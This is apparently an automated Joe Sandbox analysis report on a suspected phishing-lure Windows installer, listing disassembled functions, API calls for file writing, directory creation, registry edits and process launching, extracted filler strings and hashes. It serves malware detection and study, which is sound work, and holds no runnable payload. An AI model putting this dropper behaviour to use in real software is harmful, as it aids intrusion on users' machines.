                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                  • String ID: Completed
                  • API String ID: 2531174081-3087654605
                  • Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                  • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                  • Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                  • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 618 40317b-4031a4 GetTickCount 619 4032e5-4032ed call 402d18 618->619 620 4031aa-4031d5 call 40330d SetFilePointer 618->620 625 4032ef-4032f4 619->625 626 4031da-4031ec 620->626 627 4031f0-4031fe call 4032f7 626->627 628 4031ee 626->628 631 403204-403210 627->631 632 4032d7-4032da 627->632 628->627 633 403216-40321c 631->633 632->625 634 403247-403263 call 40638e 633->634 635 40321e-403224 633->635 640 4032e0 634->640 641 403265-40326d 634->641 635->634 637 403226-403246 call 402d18 635->637 637->634 645 4032e2-4032e3 640->645 643 4032a1-4032a7 641->643 644 40326f-403285 WriteFile 641->644 643->640 648 4032a9-4032ab 643->648 646 403287-40328b 644->646 647 4032dc-4032de 644->647 645->625 646->647 649 40328d-403299 646->649 647->645 648->640 650 4032ad-4032c0 648->650 649->633 651 40329f 649->651 650->626 652 4032c6-4032d5 SetFilePointer 650->652 651->650 652->619
                  APIs
                  • GetTickCount.KERNEL32 ref: 00403190
                    • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                  • WriteFile.KERNELBASE(0040BE78,00411E35,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                  • SetFilePointer.KERNELBASE(001350F5,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                  Strings
                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$Pointer$CountTickWrite
                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                  • API String ID: 2146148272-2559241417
                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                  • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                  • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 653 4015b9-4015cd call 402b38 call 4059de 658 401614-401617 653->658 659 4015cf-4015eb call 405960 CreateDirectoryW 653->659 660 401646-402195 call 401423 658->660 661 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 658->661 668 40160a-401612 659->668 669 4015ed-4015f8 GetLastError 659->669 674 4029c5-4029d4 660->674 661->674 677 40163e-401641 661->677 668->658 668->659 670 401607 669->670 671 4015fa-401605 GetFileAttributesW 669->671 670->668 671->668 671->670 677->674
                  APIs
                    • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,771B2EE0,00405790,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"), ref: 004059EC
                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen,?,00000000,000000F0), ref: 00401630
                  Strings
                  • C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen, xrefs: 00401623
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                  • String ID: C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen
                  • API String ID: 3751793516-3354442963
                  • Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                  • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                  • Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                  • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 679 40638e-4063b1 680 4063b3-4063b6 679->680 681 4063bb-4063be 679->681 682 406ddb-406ddf 680->682 683 4063c1-4063ca 681->683 684 4063d0 683->684 685 406dd8 683->685 686 4063d7-4063db 684->686 687 406517-406bbe 684->687 688 40647c-406480 684->688 689 4064ec-4064f0 684->689 685->682 695 4063e1-4063ee 686->695 696 406dc3-406dd6 686->696 698 406bc0-406bd6 687->698 699 406bd8-406bee 687->699 693 406486-40649f 688->693 694 406d2c-406d36 688->694 690 4064f6-40650a 689->690 691 406d3b-406d45 689->691 697 40650d-406515 690->697 691->696 700 4064a2-4064a6 693->700 694->696 695->685 701 4063f4-40643a 695->701 696->682 697->687 697->689 704 406bf1-406bf8 698->704 699->704 700->688 705 4064a8-4064ae 700->705 702 406462-406464 701->702 703 40643c-406440 701->703 708 406472-40647a 702->708 709 406466-406470 702->709 706 406442-406445 GlobalFree 703->706 707 40644b-406459 GlobalAlloc 703->707 710 406bfa-406bfe 704->710 711 406c1f-406c2b 704->711 712 4064b0-4064b7 705->712 713 4064d8-4064ea 705->713 706->707 707->685 714 40645f 707->714 708->700 709->708 709->709 715 406c04-406c1c 710->715 716 406dad-406db7 710->716 711->683 718 4064c2-4064d2 GlobalAlloc 712->718 719 4064b9-4064bc GlobalFree 712->719 713->697 714->702 715->711 716->696 718->685 718->713 719->718
                  Strings
                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                  • API String ID: 0-2559241417
                  • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                  • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                  • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                  • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 720 402b78-402ba1 RegOpenKeyExW 721 402ba3-402bae 720->721 722 402c0c-402c10 720->722 723 402bc9-402bd9 RegEnumKeyW 721->723 724 402bb0-402bb3 723->724 725 402bdb-402bed RegCloseKey call 406252 723->725 727 402c00-402c03 RegCloseKey 724->727 728 402bb5-402bc7 call 402b78 724->728 732 402c13-402c19 725->732 733 402bef-402bfe 725->733 730 402c09-402c0b 727->730 728->723 728->725 730->722 732->730 735 402c1b-402c29 RegDeleteKeyW 732->735 733->722 735->730 737 402c2b 735->737 737->722
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                  • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                  • RegCloseKey.ADVAPI32(?), ref: 00402C03
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Close$DeleteEnumOpen
                  • String ID:
                  • API String ID: 1912718029-0
                  • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                  • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                  • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                  • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 738 403060-40306e 739 403070-403086 SetFilePointer 738->739 740 40308c-403095 call 40317b 738->740 739->740 743 403175-403178 740->743 744 40309b-4030ae call 405bd7 740->744 747 403161 744->747 748 4030b4-4030c8 call 40317b 744->748 750 403163-403164 747->750 748->743 752 4030ce-4030d1 748->752 750->743 753 4030d3-4030d6 752->753 754 40313d-403143 752->754 757 403172 753->757 758 4030dc 753->758 755 403145 754->755 756 403148-40315f ReadFile 754->756 755->756 756->747 759 403166-40316f 756->759 757->743 760 4030e1-4030eb 758->760 759->757 761 4030f2-403104 call 405bd7 760->761 762 4030ed 760->762 761->747 765 403106-40311b WriteFile 761->765 762->761 766 403139-40313b 765->766 767 40311d-403120 765->767 766->750 767->766 768 403122-403135 767->768 768->760 769 403137 768->769 769->757
                  APIs
                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                  • WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                  Strings
                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$PointerWrite
                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                  • API String ID: 539440098-2559241417
                  • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                  • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                  • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                  • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 770 405b83-405b8f 771 405b90-405bc4 GetTickCount GetTempFileNameW 770->771 772 405bd3-405bd5 771->772 773 405bc6-405bc8 771->773 775 405bcd-405bd0 772->775 773->771 774 405bca 773->774 774->775
                  APIs
                  • GetTickCount.KERNEL32 ref: 00405BA1
                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BBC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CountFileNameTempTick
                  • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                  • API String ID: 1716503409-3083371207
                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                  • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                  • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                  APIs
                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                  • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                  • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                  • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CloseCreateValuelstrlen
                  • String ID:
                  • API String ID: 1356686001-0
                  • Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                  • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                  • Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                  • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                  APIs
                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                    • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                    • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                    • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                  • String ID:
                  • API String ID: 3585118688-0
                  • Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                  • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                  • Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                  • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                  APIs
